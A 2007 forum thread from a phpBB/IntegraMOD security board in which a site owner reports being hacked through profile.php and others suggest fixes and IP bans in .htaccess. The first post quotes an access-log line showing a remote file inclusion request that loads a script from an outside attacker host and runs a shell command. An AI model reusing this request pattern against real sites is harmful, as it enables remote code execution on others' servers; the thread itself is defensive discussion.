Sub Menu
Links Menu
Online Users

In total there are 310 users online :: 1 registered, 0 hidden and 309 guests

Most users ever online was 1091 on Wed Aug 16, 2023 5:27 pm

Registered users: Google [Bot] based on users active over the past 60 minutes

Security Flaw

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

Security Flaw

PostAuthor: Omni-Lee » Tue May 15, 2007 4:14 pm

A security flaw has been found with Profile.php, my website was hacked with the below command.

201.29.250.108 - - [30/Apr/2007:21:43:11 -0400] "GET
[url=http://]http://[/url]<websiteURL>/forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id
HTTP/1.1" 200
1372 <websiteURL> "-" "-" "-"

My websites URL was removed to protect my site. My hopes is that someone can find the security flaw within the offending file and create a patch ASAP. The profile system and all it entails is currently OFFLINE on my website.
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Re: Security Flaw

PostAuthor: Helter » Tue May 15, 2007 7:09 pm

try this

open profile.php

find

Code: Select all
define('IN_PHPBB', true);


after, add

Code: Select all
$phpbb_root_path = './';


save and close. not sure if that is how they got in, but it will help
Last edited by Helter on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Always use Protection
Image


Please do not PM for support
User avatar
Helter
Administrator
Administrator
 
Posts: 4167
Likes: 0 post
Liked in: 0 post
Images: 0
Joined: Sat Mar 11, 2006 3:46 pm
Cash on hand: 172.60
Location: Seattle Wa
IntegraMOD version: IM 3

PostAuthor: ZacFields » Tue May 15, 2007 7:27 pm

He must still be on 140 because 141 already has that piece of code inserted.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

Re: Security Flaw

PostAuthor: Helter » Tue May 15, 2007 9:03 pm

your correct. the code was there, it was just moved and i didnt see it...lol
Last edited by Helter on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Always use Protection
Image


Please do not PM for support
User avatar
Helter
Administrator
Administrator
 
Posts: 4167
Likes: 0 post
Liked in: 0 post
Images: 0
Joined: Sat Mar 11, 2006 3:46 pm
Cash on hand: 172.60
Location: Seattle Wa
IntegraMOD version: IM 3

PostAuthor: ZacFields » Tue May 15, 2007 9:08 pm

i don't think 140 had that though, and I think that's the string of code that stops those RFI attacks.

As long as they're not gaining access it's just pretty much the equivilant of a DDOS attack. Find the Ip's and block them from .htaccess

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

PostAuthor: Omni-Lee » Tue May 15, 2007 11:04 pm

I'm using 1.4.1, but I'll check the file and make the required changes.

Yes, the suggested changes are already within the file.

Is there anything else to try?
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

PostAuthor: Omni-Lee » Wed May 16, 2007 3:48 pm

Is there any further information I can supply to help have this issue resolved?

Until this issue is fixed I cannot enable the Profile system within my site. As such, any and all systems that are associated with Profiles are also disabled.

I eagerly await a fix.
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

PostAuthor: nGAGE » Wed May 16, 2007 10:00 pm

Check your CT Log... shouldn't CT block this stuff? Had a couple myself, but no harm done on site. CT Log showed them as blocked!
Last edited by nGAGE on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
[url=http][img=left]http://www.net-clan-gaming.eu/ftp/ngage/images/nEt_v3_sig.png[/img][/url]
User avatar
nGAGE
Sr Integra Member
Sr Integra Member
 
Posts: 248
Likes: 0 post
Liked in: 0 post
Joined: Mon Mar 27, 2006 6:28 am
Cash on hand: 0.00

PostAuthor: ZacFields » Wed May 16, 2007 11:46 pm

As long as that code is in place that helterskelter mentioned, this attack is as worthless as a DDOS attack. I suggest just to keep blocking the IP's from .htaccess and just make sure they're not getting root access (which they shouldn't be able to) and the problem will dissappear when the person initiating the exploits finally realizes that the hole is patched.

I had this same problem a month or so ago and just turned out to be nothing. It was a pain in my neck, but the long and short of it is that anyone who is not banned via .htaccess can run requests on your server to any file on your server. All that's happening in this situation is that they're running requests on your server. But beware as blocking them from phpbb or crackertracker will not solve this problem. These IP's need to be blocked from .htaccess to prevent them from running requests on your forum's files. Blocking them from crackertracker and/or phpbb just keeps them from enjoying forum functions.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

PostAuthor: nGAGE » Wed May 16, 2007 11:58 pm

Perhaps a good example on what should be added to the .htaccess file(s) <=(assuming that it's needed in more then just the root?)
I'm sure a lot of people would appreciate it! <img>

Never really needed to block IPs that way myself. Only providing the necessary access to run the forum, nothing more.
Last edited by nGAGE on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
[url=http][img=left]http://www.net-clan-gaming.eu/ftp/ngage/images/nEt_v3_sig.png[/img][/url]
User avatar
nGAGE
Sr Integra Member
Sr Integra Member
 
Posts: 248
Likes: 0 post
Liked in: 0 post
Joined: Mon Mar 27, 2006 6:28 am
Cash on hand: 0.00

PostAuthor: Omni-Lee » Thu May 17, 2007 5:28 am

The problem is, the attack I posted wasn't caught by CT, it was caught by my host after I had informed them that I was under attack. How can I block the IP of an attack when I don't know it? What does the attack allow the hackers to do?

Cripes I'm a kinship (guild) website for LoTRO, what's the point of hacking me?
Last edited by Omni-Lee on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

PostAuthor: ZacFields » Thu May 17, 2007 7:45 am

In the example that you posted Omni-Lee, the IP that was attacking you was 201.29.250.108 it's just the IP address at the beginning of that piece of log that you posted.

here is an example of what to put in .htaccess:
Code: Select all
 order allow,denydeny from 127.0.0.1deny from 127.0.0.2deny from 127.0.0.3allow from all    


You would replace the 127.0.0.1, 127.0.0.2 etc with the IP's you want to ban. the .htaccess in your root directory should be able to take care of this for you. This will prevent them from making any requests on your server.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

PostAuthor: nGAGE » Thu May 17, 2007 8:15 am

Ah... K... just like the access definitions in the apache/conf/httpd.conf :P


Thnx Zac
Last edited by nGAGE on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
[url=http][img=left]http://www.net-clan-gaming.eu/ftp/ngage/images/nEt_v3_sig.png[/img][/url]
User avatar
nGAGE
Sr Integra Member
Sr Integra Member
 
Posts: 248
Likes: 0 post
Liked in: 0 post
Joined: Mon Mar 27, 2006 6:28 am
Cash on hand: 0.00

PostAuthor: ZacFields » Thu May 17, 2007 9:40 am

^ LoL yes please don't be banning the IP's from the example. Thats a bad thing to do!

Keep us informed on this, though. But I'm pretty sure they're just trying out a very outdated exploit that might have worked on 1.4.0 but not on 1.4.1. There's just no real good way to stop them from doing it other than just continuing to ban their IP's from .htaccess.

Usually what happens is that they take control of hundreds of different servers and they use those servers to do all their dirty work for them. They just load up a .script on those servers that starts attacking other servers. What they do is very simple to do.... there are very few people that actually know how to hack, and WAY TOO MANY people who just leech off of other people's pre-written .scripts.

Also while you're banning those IP addresses, it would be a good idea to send the list of IP's to your host. Often times your host will want them so they can also ban them from their side, too. That way it keeps those IP's from accessing any sites on that host.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

PostAuthor: ZacFields » Thu May 17, 2007 9:45 am

"Omni-Lee";p="25483" wrote:Cripes I'm a kinship (guild) website for LoTRO, what's the point of hacking me?


I asked this same question when they were successfully gaining access to my root account through an old copy of 140 I had lying around on my server. My good friend that helped me rid my site of these hackers (I seriously had 3 different hackers who had access to my root at the time) notified me that the likelihood that they cared anything about my site was slim, but by gaining root access into my account they can get into other websites on my host a lot easier. And they can also use my server to help attack other servers.

It's just a big game to them. But if your site has no financial records such as customer credit card numbers and stuff, these hackers probably don't care anything about your site and probably won't do anything to it. Like I said, I had 3 of them in my box all at once and not one of them ever touched my forums. They were just running .scripts off my site attacking other servers.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

Next

Return to Forum Security

Who is online

Registered users: Google [Bot]

cron